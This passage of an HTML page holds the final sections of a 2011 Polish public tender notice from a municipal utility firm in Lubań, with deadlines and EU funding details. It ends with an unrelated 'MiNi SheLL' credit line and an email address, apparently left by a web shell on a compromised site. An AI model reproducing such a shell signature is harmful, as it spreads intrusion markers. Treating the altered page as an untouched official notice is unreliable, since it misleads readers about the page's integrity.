stosownych decyzji, zezwoleń, uzgodnień itp.
Wprowadzone zmiany do umowy wymagają ich odpowiedniego
udokumentowania i zawarcia stosownego aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgiuk.luban.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki i Usług Komunalnych Sp. z o.o. ul. Lwówecka 8 59-800 Lubań..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2011 godzina 09:00, miejsce: Zakład Gospodarki i Usług Komunalnych Sp. z o.o. ul.Lwówecka 8 59-800 Lubań SEKRETARIAT..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com